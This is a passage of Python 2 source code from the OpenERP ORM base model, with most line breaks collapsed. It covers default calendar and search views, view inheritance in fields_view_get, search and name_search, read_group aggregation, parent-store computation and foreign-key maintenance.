Returns whether it's found a suitable value (and set it on the attribute) or not """ for item in seq: if item in in_: view.set(to, item) return True return False view = etree.Element('calendar', string=self._description) etree.SubElement(view, 'field', name=self._rec_name) if (self._date_name not in self._columns): date_found = False for dt in ['date', 'date_start', 'x_date', 'x_date_start']: if dt in self._columns: self._date_name = dt date_found = True break if not date_found: raise except_orm(_('Invalid Object Architecture!'), _("Insufficient fields for Calendar View!")) view.set('date_start', self._date_name) set_first_of(["user_id", "partner_id", "x_user_id", "x_partner_id"], self._columns, 'color') if not set_first_of(["date_stop", "date_end", "x_date_stop", "x_date_end"], self._columns, 'date_stop'): if not set_first_of(["date_delay", "planned_hours", "x_date_delay", "x_planned_hours"], self._columns, 'date_delay'): raise except_orm( _('Invalid Object Architecture!'), _("Insufficient fields to generate a Calendar View for %s, missing a date_stop or a date_delay" % (self._name))) return view def _get_default_search_view(self, cr, uid, context=None): """ :param cr: database cursor :param int user: user id :param dict context: connection context :returns: an lxml document of the view :rtype: etree._Element """ form_view = self.fields_view_get(cr, uid, False, 'form', context=context) tree_view = self.fields_view_get(cr, uid, False, 'tree', context=context) # TODO it seems _all_columns could be used instead of fields_get (no need for translated fields info) fields = self.fields_get(cr, uid, context=context) fields_to_search = set( field for field, descriptor in fields.iteritems() if descriptor.get('select')) for view in (form_view, tree_view): view_root = etree.fromstring(view['arch']) # Only care about select=1 in xpath below, because select=2 is covered # by the custom advanced search in clients 
            fields_to_search.update(view_root.xpath("//field[@select=1]/@name"))

        tree_view_root = view_root # as provided by loop above
        search_view = etree.Element("search", string=tree_view_root.get("string", ""))

        field_group = etree.SubElement(search_view, "group")
        for field_name in fields_to_search:
            etree.SubElement(field_group, "field", name=field_name)

        return search_view

    #
    # if view_id, view_type is not required
    #
    def fields_view_get(self, cr, user, view_id=None, view_type='form', context=None, toolbar=False, submenu=False):
        """ Get the detailed composition of the requested view like fields, model, view architecture

        :param cr: database cursor
        :param user: current user id
        :param view_id: id of the view or None
        :param view_type: type of the view to return if view_id is None ('form', tree', ...)
        :param context: context arguments, like lang, time zone
        :param toolbar: true to include contextual actions
        :param submenu: deprecated
        :return: dictionary describing the composition of the requested view (including inherited views and extensions)
        :raise AttributeError:
                            * if the inherited view has unknown position to work with other than 'before', 'after', 'inside', 'replace'
                            * if some tag other than 'position' is found in parent view
        :raise Invalid ArchitectureError: if there is view type other than form, tree, calendar, search etc defined on the structure
        """
        if context is None:
            context = {}

        def encode(s):
            # etree wants utf-8 bytes, not unicode (Python 2)
            if isinstance(s, unicode):
                return s.encode('utf8')
            return s

        def raise_view_error(error_msg, child_view_id):
            # enrich the error with the xml_id of the offending inherited view
            view, child_view = self.pool.get('ir.ui.view').browse(cr, user, [view_id, child_view_id], context)
            raise AttributeError("View definition error for inherited view '%s' on model '%s': %s"
                                 % (child_view.xml_id, self._name, error_msg))

        def locate(source, spec):
            """ Locate a node in a source (parent) architecture.

            Given a complete source (parent) architecture (i.e.
the field `arch` in a view), and a 'spec' node (a node in an inheriting view that specifies the location in the source view of what should be changed), return (if it exists) the node in the source view matching the specification. :param source: a parent architecture to modify :param spec: a modifying node in an inheriting view :return: a node in the source matching the spec """ if spec.tag == 'xpath': nodes = source.xpath(spec.get('expr')) return nodes[0] if nodes else None elif spec.tag == 'field': # Only compare the field name: a field can be only once in a given view # at a given level (and for multilevel expressions, we should use xpath # inheritance spec anyway). for node in source.getiterator('field'): if node.get('name') == spec.get('name'): return node return None else: for node in source.getiterator(spec.tag): good = True for attr in spec.attrib: if attr != 'position' and (not node.get(attr) or node.get(attr) != spec.get(attr)): good = False break if good: return node return None def apply_inheritance_specs(source, specs_arch, inherit_id=None): """ Apply an inheriting view. Apply to a source architecture all the spec nodes (i.e. nodes describing where and what changes to apply to some parent architecture) given by an inheriting view. :param source: a parent architecture to modify :param specs_arch: a modifying architecture in an inheriting view :param inherit_id: the database id of the inheriting view :return: a modified source where the specs are applied """ specs_tree = etree.fromstring(encode(specs_arch)) # Queue of specification nodes (i.e. nodes describing where and # changes to apply to some parent architecture). 
specs = [specs_tree] while len(specs): spec = specs.pop(0) if isinstance(spec, SKIPPED_ELEMENT_TYPES): continue if spec.tag == 'data': specs += [ c for c in specs_tree ] continue node = locate(source, spec) if node is not None: pos = spec.get('position', 'inside') if pos == 'replace': if node.getparent() is None: source = copy.deepcopy(spec[0]) else: for child in spec: node.addprevious(child) node.getparent().remove(node) elif pos == 'attributes': for child in spec.getiterator('attribute'): attribute = (child.get('name'), child.text and child.text.encode('utf8') or None) if attribute[1]: node.set(attribute[0], attribute[1]) else: del(node.attrib[attribute[0]]) else: sib = node.getnext() for child in spec: if pos == 'inside': node.append(child) elif pos == 'after': if sib is None: node.addnext(child) node = child else: sib.addprevious(child) elif pos == 'before': node.addprevious(child) else: raise_view_error("Invalid position value: '%s'" % pos, inherit_id) else: attrs = ''.join([ ' %s="%s"' % (attr, spec.get(attr)) for attr in spec.attrib if attr != 'position' ]) tag = "<%s%s>" % (spec.tag, attrs) raise_view_error("Element '%s' not found in parent view '%%(parent_xml_id)s'" % tag, inherit_id) return source def apply_view_inheritance(cr, user, source, inherit_id): """ Apply all the (directly and indirectly) inheriting views. 
:param source: a parent architecture to modify (with parent modifications already applied) :param inherit_id: the database view_id of the parent view :return: a modified source where all the modifying architecture are applied """ sql_inherit = self.pool.get('ir.ui.view').get_inheriting_views_arch(cr, user, inherit_id, self._name) for (view_arch, view_id) in sql_inherit: source = apply_inheritance_specs(source, view_arch, view_id) source = apply_view_inheritance(cr, user, source, view_id) return source result = {'type': view_type, 'model': self._name} sql_res = False parent_view_model = None view_ref = context.get(view_type + '_view_ref') # Search for a root (i.e. without any parent) view. while True: if view_ref and not view_id: if '.' in view_ref: module, view_ref = view_ref.split('.', 1) cr.execute("SELECT res_id FROM ir_model_data WHERE model='ir.ui.view' AND module=%s AND name=%s", (module, view_ref)) view_ref_res = cr.fetchone() if view_ref_res: view_id = view_ref_res[0] if view_id: cr.execute("""SELECT arch,name,field_parent,id,type,inherit_id,model FROM ir_ui_view WHERE id=%s""", (view_id,)) else: cr.execute("""SELECT arch,name,field_parent,id,type,inherit_id,model FROM ir_ui_view WHERE model=%s AND type=%s AND inherit_id IS NULL ORDER BY priority""", (self._name, view_type)) sql_res = cr.dictfetchone() if not sql_res: break view_id = sql_res['inherit_id'] or sql_res['id'] parent_view_model = sql_res['model'] if not sql_res['inherit_id']: break # if a view was found if sql_res: source = etree.fromstring(encode(sql_res['arch'])) result.update( arch=apply_view_inheritance(cr, user, source, sql_res['id']), type=sql_res['type'], view_id=sql_res['id'], name=sql_res['name'], field_parent=sql_res['field_parent'] or False) else: # otherwise, build some kind of default view try: view = getattr(self, '_get_default_%s_view' % view_type)( cr, user, context) except AttributeError: # what happens here, graph case? 
                raise except_orm(_('Invalid Architecture!'), _("There is no view of type '%s' defined for the structure!") % view_type)
            result.update(
                arch=view,
                name='default',
                field_parent=False,
                view_id=0)

        if parent_view_model != self._name:
            # keep the root view's model around for translation fallback
            ctx = context.copy()
            ctx['base_model_name'] = parent_view_model
        else:
            ctx = context
        xarch, xfields = self.__view_look_dom_arch(cr, user, result['arch'], view_id, context=ctx)
        result['arch'] = xarch
        result['fields'] = xfields

        if toolbar:
            def clean(x):
                # strip the heavy report payload keys from an ir.values action
                x = x[2]
                for key in ('report_sxw_content', 'report_rml_content',
                        'report_sxw', 'report_rml',
                        'report_sxw_content_data', 'report_rml_content_data'):
                    if key in x:
                        del x[key]
                return x
            ir_values_obj = self.pool.get('ir.values')
            resprint = ir_values_obj.get(cr, user, 'action', 'client_print_multi', [(self._name, False)], False, context)
            resaction = ir_values_obj.get(cr, user, 'action', 'client_action_multi', [(self._name, False)], False, context)
            resrelate = ir_values_obj.get(cr, user, 'action', 'client_action_relate', [(self._name, False)], False, context)
            # 'multi' actions only make sense on list (tree) views
            resaction = [clean(action) for action in resaction if view_type == 'tree' or not action[2].get('multi')]
            resprint = [clean(print_) for print_ in resprint if view_type == 'tree' or not print_[2].get('multi')]
            resrelate = map(lambda x: x[2], resrelate)

            for x in itertools.chain(resprint, resaction, resrelate):
                x['string'] = x['name']

            result['toolbar'] = {
                'print': resprint,
                'action': resaction,
                'relate': resrelate
            }
        return result

    _view_look_dom_arch = __view_look_dom_arch

    def search_count(self, cr, user, args, context=None):
        # Number of records matching the domain ``args``.
        if not context:
            context = {}
        res = self.search(cr, user, args, context=context, count=True)
        if isinstance(res, list):
            return len(res)
        return res

    def search(self, cr, user, args, offset=0, limit=None, order=None,
            context=None, count=False):
        """ Search for records based on a search domain.
:param cr: database cursor :param user: current user id :param args: list of tuples specifying the search domain [('field_name', 'operator', value), ...]. Pass an empty list to match all records. :param offset: optional number of results to skip in the returned values (default: 0) :param limit: optional max number of records to return (default: **None**) :param order: optional columns to sort by (default: self._order=id ) :param context: optional context arguments, like lang, time zone :type context: dictionary :param count: optional (default: **False**), if **True**, returns only the number of records matching the criteria, not their ids :return: id or list of ids of records matching the criteria :rtype: integer or list of integers :raise AccessError: * if user tries to bypass access rules for read on the requested object. **Expressing a search domain (args)** Each tuple in the search domain needs to have 3 elements, in the form: **('field_name', 'operator', value)**, where: * **field_name** must be a valid name of field of the object model, possibly following many-to-one relationships using dot-notation, e.g 'street' or 'partner_id.country' are valid values. * **operator** must be a string with a valid comparison operator from this list: ``=, !=, >, >=, <, <=, like, ilike, in, not in, child_of, parent_left, parent_right`` The semantics of most of these operators are obvious. The ``child_of`` operator will look for records who are children or grand-children of a given record, according to the semantics of this model (i.e following the relationship field named by ``self._parent_name``, by default ``parent_id``. * **value** must be a valid value to compare with the values of **field_name**, depending on its type. Domain criteria can be combined using 3 logical operators than can be added between tuples: '**&**' (logical AND, default), '**|**' (logical OR), '**!**' (logical NOT). 
These are **prefix** operators and the arity of the '**&**' and '**|**' operator is 2, while the arity of the '**!**' is just 1. Be very careful about this when you combine them the first time. Here is an example of searching for Partners named *ABC* from Belgium and Germany whose language is not english :: [('name','=','ABC'),'!',('language.code','=','en_US'),'|',('country_id.code','=','be'),('country_id.code','=','de')) The '&' is omitted as it is the default, and of course we could have used '!=' for the language, but what this domain really represents is:: (name is 'ABC' AND (language is NOT english) AND (country is Belgium OR Germany)) """ return self._search(cr, user, args, offset=offset, limit=limit, order=order, context=context, count=count) def name_get(self, cr, user, ids, context=None): """Returns the preferred display value (text representation) for the records with the given ``ids``. By default this will be the value of the ``name`` column, unless the model implements a custom behavior. Can sometimes be seen as the inverse function of :meth:`~.name_search`, but it is not guaranteed to be. :rtype: list(tuple) :return: list of pairs ``(id,text_repr)`` for all records with the given ``ids``. """ if not ids: return [] if isinstance(ids, (int, long)): ids = [ids] return [(r['id'], tools.ustr(r[self._rec_name])) for r in self.read(cr, user, ids, [self._rec_name], context, load='_classic_write')] def name_search(self, cr, user, name='', args=None, operator='ilike', context=None, limit=100): """Search for records that have a display name matching the given ``name`` pattern if compared with the given ``operator``, while also matching the optional search domain (``args``). This is used for example to provide suggestions based on a partial value for a relational field. Sometimes be seen as the inverse function of :meth:`~.name_get`, but it is not guaranteed to be. 
This method is equivalent to calling :meth:`~.search` with a search domain based on ``name`` and then :meth:`~.name_get` on the result of the search. :param list args: optional search domain (see :meth:`~.search` for syntax), specifying further restrictions :param str operator: domain operator for matching the ``name`` pattern, such as ``'like'`` or ``'='``. :param int limit: optional max number of records to return :rtype: list :return: list of pairs ``(id,text_repr)`` for all matching records. """ return self._name_search(cr, user, name, args, operator, context, limit) def name_create(self, cr, uid, name, context=None): """Creates a new record by calling :meth:`~.create` with only one value provided: the name of the new record (``_rec_name`` field). The new record will also be initialized with any default values applicable to this model, or provided through the context. The usual behavior of :meth:`~.create` applies. Similarly, this method may raise an exception if the model has multiple required fields and some do not have default values. :param name: name of the record to create :rtype: tuple :return: the :meth:`~.name_get` pair value for the newly-created record. 
""" rec_id = self.create(cr, uid, {self._rec_name: name}, context); return self.name_get(cr, uid, [rec_id], context)[0] # private implementation of name_search, allows passing a dedicated user for the name_get part to # solve some access rights issues def _name_search(self, cr, user, name='', args=None, operator='ilike', context=None, limit=100, name_get_uid=None): if args is None: args = [] if context is None: context = {} args = args[:] # optimize out the default criterion of ``ilike ''`` that matches everything if not (name == '' and operator == 'ilike'): args += [(self._rec_name, operator, name)] access_rights_uid = name_get_uid or user ids = self._search(cr, user, args, limit=limit, context=context, access_rights_uid=access_rights_uid) res = self.name_get(cr, access_rights_uid, ids, context) return res def read_string(self, cr, uid, id, langs, fields=None, context=None): res = {} res2 = {} self.pool.get('ir.translation').check_read(cr, uid) if not fields: fields = self._columns.keys() + self._inherit_fields.keys() #FIXME: collect all calls to _get_source into one SQL call. 
for lang in langs: res[lang] = {'code': lang} for f in fields: if f in self._columns: res_trans = self.pool.get('ir.translation')._get_source(cr, uid, self._name+','+f, 'field', lang) if res_trans: res[lang][f] = res_trans else: res[lang][f] = self._columns[f].string for table in self._inherits: cols = intersect(self._inherit_fields.keys(), fields) res2 = self.pool.get(table).read_string(cr, uid, id, langs, cols, context) for lang in res2: if lang in res: res[lang]['code'] = lang for f in res2[lang]: res[lang][f] = res2[lang][f] return res def write_string(self, cr, uid, id, langs, vals, context=None): self.pool.get('ir.translation').check_write(cr, uid) #FIXME: try to only call the translation in one SQL for lang in langs: for field in vals: if field in self._columns: src = self._columns[field].string self.pool.get('ir.translation')._set_ids(cr, uid, self._name+','+field, 'field', lang, [0], vals[field], src) for table in self._inherits: cols = intersect(self._inherit_fields.keys(), vals) if cols: self.pool.get(table).write_string(cr, uid, id, langs, vals, context) return True def _add_missing_default_values(self, cr, uid, values, context=None): missing_defaults = [] avoid_tables = [] # avoid overriding inherited values when parent is set for tables, parent_field in self._inherits.items(): if parent_field in values: avoid_tables.append(tables) for field in self._columns.keys(): if not field in values: missing_defaults.append(field) for field in self._inherit_fields.keys(): if (field not in values) and (self._inherit_fields[field][0] not in avoid_tables): missing_defaults.append(field) if len(missing_defaults): # override defaults with the provided values, never allow the other way around defaults = self.default_get(cr, uid, missing_defaults, context) for dv in defaults: if ((dv in self._columns and self._columns[dv]._type == 'many2many') \ or (dv in self._inherit_fields and self._inherit_fields[dv][2]._type == 'many2many')) \ and defaults[dv] and 
isinstance(defaults[dv][0], (int, long)): defaults[dv] = [(6, 0, defaults[dv])] if (dv in self._columns and self._columns[dv]._type == 'one2many' \ or (dv in self._inherit_fields and self._inherit_fields[dv][2]._type == 'one2many')) \ and isinstance(defaults[dv], (list, tuple)) and defaults[dv] and isinstance(defaults[dv][0], dict): defaults[dv] = [(0, 0, x) for x in defaults[dv]] defaults.update(values) values = defaults return values def clear_caches(self): """ Clear the caches This clears the caches associated to methods decorated with ``tools.ormcache`` or ``tools.ormcache_multi``. """ try: getattr(self, '_ormcache') self._ormcache = {} self.pool._any_cache_cleared = True except AttributeError: pass def _read_group_fill_results(self, cr, uid, domain, groupby, groupby_list, aggregated_fields, read_group_result, read_group_order=None, context=None): """Helper method for filling in empty groups for all possible values of the field being grouped by""" # self._group_by_full should map groupable fields to a method that returns # a list of all aggregated values that we want to display for this field, # in the form of a m2o-like pair (key,label). # This is useful to implement kanban views for instance, where all columns # should be displayed even if they don't contain any record. # Grab the list of all groups that should be displayed, including all present groups present_group_ids = [x[groupby][0] for x in read_group_result if x[groupby]] all_groups = self._group_by_full[groupby](self, cr, uid, present_group_ids, domain, read_group_order=read_group_order, access_rights_uid=openerp.SUPERUSER_ID, context=context) result_template = dict.fromkeys(aggregated_fields, False) result_template.update({groupby + '_count':0}) if groupby_list and len(groupby_list) > 1: result_template.update(__context={'group_by': groupby_list[1:]}) # Merge the left_side (current results as dicts) with the right_side (all # possible values as m2o pairs). 
Both lists are supposed to be using the # same ordering, and can be merged in one pass. result = [] known_values = {} def append_left(left_side): grouped_value = left_side[groupby] and left_side[groupby][0] if not grouped_value in known_values: result.append(left_side) known_values[grouped_value] = left_side else: count_attr = groupby + '_count' known_values[grouped_value].update({count_attr: left_side[count_attr]}) def append_right(right_side): grouped_value = right_side[0] if not grouped_value in known_values: line = dict(result_template) line.update({ groupby: right_side, '__domain': [(groupby,'=',grouped_value)] + domain, }) result.append(line) known_values[grouped_value] = line while read_group_result or all_groups: left_side = read_group_result[0] if read_group_result else None right_side = all_groups[0] if all_groups else None assert left_side is None or left_side[groupby] is False \ or isinstance(left_side[groupby], (tuple,list)), \ 'M2O-like pair expected, got %r' % left_side[groupby] assert right_side is None or isinstance(right_side, (tuple,list)), \ 'M2O-like pair expected, got %r' % right_side if left_side is None: append_right(all_groups.pop(0)) elif right_side is None: append_left(read_group_result.pop(0)) elif left_side[groupby] == right_side: append_left(read_group_result.pop(0)) all_groups.pop(0) # discard right_side elif not left_side[groupby] or not left_side[groupby][0]: # left side == "Undefined" entry, not present on right_side append_left(read_group_result.pop(0)) else: append_right(all_groups.pop(0)) return result def read_group(self, cr, uid, domain, fields, groupby, offset=0, limit=None, context=None, orderby=False): """ Get the list of records in list view grouped by the given ``groupby`` fields :param cr: database cursor :param uid: current user id :param domain: list specifying search criteria [['field_name', 'operator', 'value'], ...] 
:param list fields: list of fields present in the list view specified on the object :param list groupby: fields by which the records will be grouped :param int offset: optional number of records to skip :param int limit: optional max number of records to return :param dict context: context arguments, like lang, time zone :param list orderby: optional ``order by`` specification, for overriding the natural sort ordering of the groups, see also :py:meth:`~osv.osv.osv.search` (supported only for many2one fields currently) :return: list of dictionaries(one dictionary for each record) containing: * the values of fields grouped by the fields in ``groupby`` argument * __domain: list of tuples specifying the search criteria * __context: dictionary with argument like ``groupby`` :rtype: [{'field_name_1': value, ...] :raise AccessError: * if user has no read rights on the requested object * if user tries to bypass access rules for read on the requested object """ context = context or {} self.check_read(cr, uid) if not fields: fields = self._columns.keys() query = self._where_calc(cr, uid, domain, context=context) self._apply_ir_rules(cr, uid, query, 'read', context=context) # Take care of adding join(s) if groupby is an '_inherits'ed field groupby_list = groupby qualified_groupby_field = groupby if groupby: if isinstance(groupby, list): groupby = groupby[0] qualified_groupby_field = self._inherits_join_calc(groupby, query) if groupby: assert not groupby or groupby in fields, "Fields in 'groupby' must appear in the list of fields to read (perhaps it's missing in the list view?)" groupby_def = self._columns.get(groupby) or (self._inherit_fields.get(groupby) and self._inherit_fields.get(groupby)[2]) assert groupby_def and groupby_def._classic_write, "Fields in 'groupby' must be regular database-persisted fields (no function or related fields), or function fields with store=True" # TODO it seems fields_get can be replaced by _all_columns (no need for translation) fget = 
self.fields_get(cr, uid, fields) flist = '' group_count = group_by = groupby if groupby: if fget.get(groupby): groupby_type = fget[groupby]['type'] if groupby_type in ('date', 'datetime'): qualified_groupby_field = "to_char(%s,'yyyy-mm')" % qualified_groupby_field flist = "%s as %s " % (qualified_groupby_field, groupby) elif groupby_type == 'boolean': qualified_groupby_field = "coalesce(%s,false)" % qualified_groupby_field flist = "%s as %s " % (qualified_groupby_field, groupby) else: flist = qualified_groupby_field else: # Don't allow arbitrary values, as this would be a SQL injection vector! raise except_orm(_('Invalid group_by'), _('Invalid group_by specification: "%s".\nA group_by specification must be a list of valid fields.')%(groupby,)) aggregated_fields = [ f for f in fields if f not in ('id', 'sequence') if fget[f]['type'] in ('integer', 'float') if (f in self._columns and getattr(self._columns[f], '_classic_write'))] for f in aggregated_fields: group_operator = fget[f].get('group_operator', 'sum') if flist: flist += ', ' qualified_field = '"%s"."%s"' % (self._table, f) flist += "%s(%s) AS %s" % (group_operator, qualified_field, f) gb = groupby and (' GROUP BY ' + qualified_groupby_field) or '' from_clause, where_clause, where_clause_params = query.get_sql() where_clause = where_clause and ' WHERE ' + where_clause limit_str = limit and ' limit %d' % limit or '' offset_str = offset and ' offset %d' % offset or '' if len(groupby_list) < 2 and context.get('group_by_no_leaf'): group_count = '_' cr.execute('SELECT min(%s.id) AS id, count(%s.id) AS %s_count' % (self._table, self._table, group_count) + (flist and ',') + flist + ' FROM ' + from_clause + where_clause + gb + limit_str + offset_str, where_clause_params) alldata = {} groupby = group_by for r in cr.dictfetchall(): for fld, val in r.items(): if val == None: r[fld] = False alldata[r['id']] = r del r['id'] order = orderby or groupby data_ids = self.search(cr, uid, [('id', 'in', alldata.keys())], 
order=order, context=context) # the IDs of records that have groupby field value = False or '' should be included too data_ids += set(alldata.keys()).difference(data_ids) if groupby: data = self.read(cr, uid, data_ids, [groupby], context=context) # restore order of the search as read() uses the default _order (this is only for groups, so the footprint of data should be small): data_dict = dict((d['id'], d[groupby] ) for d in data) result = [{'id': i, groupby: data_dict[i]} for i in data_ids] else: result = [{'id': i} for i in data_ids] for d in result: if groupby: d['__domain'] = [(groupby, '=', alldata[d['id']][groupby] or False)] + domain if not isinstance(groupby_list, (str, unicode)): if groupby or not context.get('group_by_no_leaf', False): d['__context'] = {'group_by': groupby_list[1:]} if groupby and groupby in fget: if d[groupby] and fget[groupby]['type'] in ('date', 'datetime'): dt = datetime.datetime.strptime(alldata[d['id']][groupby][:7], '%Y-%m') days = calendar.monthrange(dt.year, dt.month)[1] d[groupby] = datetime.datetime.strptime(d[groupby][:10], '%Y-%m-%d').strftime('%B %Y') d['__domain'] = [(groupby, '>=', alldata[d['id']][groupby] and datetime.datetime.strptime(alldata[d['id']][groupby][:7] + '-01', '%Y-%m-%d').strftime('%Y-%m-%d') or False),\ (groupby, '<=', alldata[d['id']][groupby] and datetime.datetime.strptime(alldata[d['id']][groupby][:7] + '-' + str(days), '%Y-%m-%d').strftime('%Y-%m-%d') or False)] + domain del alldata[d['id']][groupby] d.update(alldata[d['id']]) del d['id'] if groupby and groupby in self._group_by_full: result = self._read_group_fill_results(cr, uid, domain, groupby, groupby_list, aggregated_fields, result, read_group_order=order, context=context) return result def _inherits_join_add(self, current_table, parent_model_name, query): """ Add missing table SELECT and JOIN clause to ``query`` for reaching the parent table (no duplicates) :param current_table: current model object :param parent_model_name: name of the parent 
model for which the clauses should be added :param query: query object on which the JOIN should be added """ inherits_field = current_table._inherits[parent_model_name] parent_model = self.pool.get(parent_model_name) parent_table_name = parent_model._table quoted_parent_table_name = '"%s"' % parent_table_name if quoted_parent_table_name not in query.tables: query.tables.append(quoted_parent_table_name) query.where_clause.append('(%s.%s = %s.id)' % (current_table._table, inherits_field, parent_table_name)) def _inherits_join_calc(self, field, query): """ Adds missing table select and join clause(s) to ``query`` for reaching the field coming from an '_inherits' parent table (no duplicates). :param field: name of inherited field to reach :param query: query object on which the JOIN should be added :return: qualified name of field, to be used in SELECT clause """ current_table = self while field in current_table._inherit_fields and not field in current_table._columns: parent_model_name = current_table._inherit_fields[field][0] parent_table = self.pool.get(parent_model_name) self._inherits_join_add(current_table, parent_model_name, query) current_table = parent_table return '"%s".%s' % (current_table._table, field) def _parent_store_compute(self, cr): if not self._parent_store: return _logger.info('Computing parent left and right for table %s...', self._table) def browse_rec(root, pos=0): # TODO: set order where = self._parent_name+'='+str(root) if not root: where = self._parent_name+' IS NULL' if self._parent_order: where += ' order by '+self._parent_order cr.execute('SELECT id FROM '+self._table+' WHERE '+where) pos2 = pos + 1 for id in cr.fetchall(): pos2 = browse_rec(id[0], pos2) cr.execute('update '+self._table+' set parent_left=%s, parent_right=%s where id=%s', (pos, pos2, root)) return pos2 + 1 query = 'SELECT id FROM '+self._table+' WHERE '+self._parent_name+' IS NULL' if self._parent_order: query += ' order by ' + self._parent_order pos = 0 cr.execute(query) 
for (root,) in cr.fetchall(): pos = browse_rec(root, pos) return True def _update_store(self, cr, f, k): _logger.info("storing computed values of fields.function '%s'", k) ss = self._columns[k]._symbol_set update_query = 'UPDATE "%s" SET "%s"=%s WHERE id=%%s' % (self._table, k, ss[0]) cr.execute('select id from '+self._table) ids_lst = map(lambda x: x[0], cr.fetchall()) while ids_lst: iids = ids_lst[:40] ids_lst = ids_lst[40:] res = f.get(cr, self, iids, k, SUPERUSER_ID, {}) for key, val in res.items(): if f._multi: val = val[k] # if val is a many2one, just write the ID if type(val) == tuple: val = val[0] if (val<>False) or (type(val)<>bool): cr.execute(update_query, (ss[1](val), key)) def _check_selection_field_value(self, cr, uid, field, value, context=None): """Raise except_orm if value is not among the valid values for the selection field""" if self._columns[field]._type == 'reference': val_model, val_id_str = value.split(',', 1) val_id = False try: val_id = long(val_id_str) except ValueError: pass if not val_id: raise except_orm(_('ValidateError'), _('Invalid value for reference field "%s.%s" (last part must be a non-zero integer): "%s"') % (self._table, field, value)) val = val_model else: val = value if isinstance(self._columns[field].selection, (tuple, list)): if val in dict(self._columns[field].selection): return elif val in dict(self._columns[field].selection(self, cr, uid, context=context)): return raise except_orm(_('ValidateError'), _('The value "%s" for the field "%s.%s" is not in the selection') % (value, self._table, field)) def _check_removed_columns(self, cr, log=False): # iterate on the database columns to drop the NOT NULL constraints # of fields which were required but have been removed (or will be added by another module) columns = [c for c in self._columns if not (isinstance(self._columns[c], fields.function) and not self._columns[c].store)] columns += MAGIC_COLUMNS cr.execute("SELECT a.attname, a.attnotnull" " FROM pg_class c, pg_attribute 
a" " WHERE c.relname=%s" " AND c.oid=a.attrelid" " AND a.attisdropped=%s" " AND pg_catalog.format_type(a.atttypid, a.atttypmod) NOT IN ('cid', 'tid', 'oid', 'xid')" " AND a.attname NOT IN %s", (self._table, False, tuple(columns))), for column in cr.dictfetchall(): if log: _logger.debug("column %s is in the table %s but not in the corresponding object %s", column['attname'], self._table, self._name) if column['attnotnull']: cr.execute('ALTER TABLE "%s" ALTER COLUMN "%s" DROP NOT NULL' % (self._table, column['attname'])) _schema.debug("Table '%s': column '%s': dropped NOT NULL constraint", self._table, column['attname']) # checked version: for direct m2o starting from `self` def _m2o_add_foreign_key_checked(self, source_field, dest_model, ondelete): assert self.is_transient() or not dest_model.is_transient(), \ 'Many2One relationships from non-transient Model to TransientModel are forbidden' if self.is_transient() and not dest_model.is_transient(): # TransientModel relationships to regular Models are annoying # usually because they could block deletion due to the FKs. # So unless stated otherwise we default them to ondelete=cascade. 
ondelete = ondelete or 'cascade' self._foreign_keys.append((self._table, source_field, dest_model._table, ondelete or 'set null')) _schema.debug("Table '%s': added foreign key '%s' with definition=REFERENCES \"%s\" ON DELETE %s", self._table, source_field, dest_model._table, ondelete) # unchecked version: for custom cases, such as m2m relationships def _m2o_add_foreign_key_unchecked(self, source_table, source_field, dest_model, ondelete): self._foreign_keys.append((source_table, source_field, dest_model._table, ondelete or 'set null')) _schema.debug("Table '%s': added foreign key '%s' with definition=REFERENCES \"%s\" ON DELETE %s", source_table, source_field, dest_model._table, ondelete) def _drop_constraint(self, cr, source_table, constraint_name): cr.execute("ALTER TABLE %s DROP CONSTRAINT %s" % (source_table,constraint_name)) def _m2o_fix_foreign_key(self, cr, source_table, source_field, dest_model, ondelete): # Find FK constraint(s) currently established for the m2o field, # and see whether they are stale or not cr.execute("""SELECT confdeltype as ondelete_rule, conname as constraint_name, cl2.relname as foreign_table FROM pg_constraint as con, pg_class as cl1, pg_class as cl2, pg_attribute as att1, pg_attribute as att2 WHERE con.conrelid = cl1.oid AND cl1.relname = %s AND con.confrelid = cl2.oid AND array_lower(con.conkey, 1) = 1 AND con.conkey[1] = att1.attnum AND att1.attrelid = cl1.oid AND att1.attname = %s AND array_lower(con.confkey, 1) = 1 AND con.confkey[1] = att2.attnum AND att2.attrelid = cl2.oid AND att2.attname = %s AND con.contype = 'f'""", (source_table, source_field, 'id')) constraints = cr.dictfetchall() if constraints: if len(constraints) == 1: # Is it the right constraint? 
cons, = constraints if cons['ondelete_rule'] != POSTGRES_CONFDELTYPES.get((ondelete or 'set null').upper(), 'a')\ or cons['foreign_table'] != dest_model._table: _schema.debug("Table '%s': dropping obsolete FK constraint: '%s'", source_table, cons['constraint_name']) self._drop_constraint(cr, source_table, cons['constraint_name']) self._m2o_add_foreign_key_checked(source_field, dest_model, ondelete) # else it's all good, nothing to do! else: # Multiple FKs found for the same field, drop them all, and re-create for cons in constraints: _schema.debug("Table '%s': dropping duplicate FK constraints: '%s'", source_table, cons['constraint_name']) self._drop_constraint(cr, source_table, cons['constraint_name']) self._m2o_add_foreign_key_checked(source_field, dest_model, ondelete) def _auto_init(self, cr, context=None): """ Call _field_create and, unless _auto is False: - create the corresponding table in database for the model, - possibly add the parent columns in database, - possibly add the columns 'create_uid', 'create_date', 'write_uid', 'write_date' in database if _log_access is True (the default), - report on database columns no more existing in _columns, - remove no more existing not null constraints, - alter existing database columns to match _columns, - create database tables to match _columns, - add database indices to match _columns, - save in self._foreign_keys a list a foreign keys to create (see _auto_end). """ self._foreign_keys = [] raise_on_invalid_object_name(self._name) if context is None: context = {} store_compute = False todo_end = [] update_custom_fields = context.get('update_custom_fields', False) self._field_create(cr, context=context) create = not self._table_exist(cr) if getattr(self, '_auto', True): if create: self._create_table(cr) cr.commit() if self._parent_store: if not self._parent_columns_exist(cr): self._create_parent_columns(cr) store_compute = True # Create the create_uid, create_date, write_uid, write_date, columns if desired. 
if self._log_access: self._add_log_columns(cr) self._check_removed_columns(cr, log=False) # iterate on the "object columns" column_data = self._select_column_data(cr) for k, f in self._columns.iteritems(): if k in MAGIC_COLUMNS: continue # Don't update custom (also called manual) fields if f.manual and not update_custom_fields: continue if isinstance(f, fields.one2many): self._o2m_raise_on_missing_reference(cr, f) elif isinstance(f, fields.many2many): self._m2m_raise_or_create_relation(cr, f) else: res = column_data.get(k) # The field is not found as-is in database, try if it # exists with an old name. if not res and hasattr(f, 'oldname'): res = column_data.get(f.oldname) if res: cr.execute('ALTER TABLE "%s" RENAME "%s" TO "%s"' % (self._table, f.oldname, k)) res['attname'] = k column_data[k] = res _schema.debug("Table '%s': renamed column '%s' to '%s'", self._table, f.oldname, k) # The field already exists in database. Possibly # change its type, rename it, drop it or change its # constraints. 
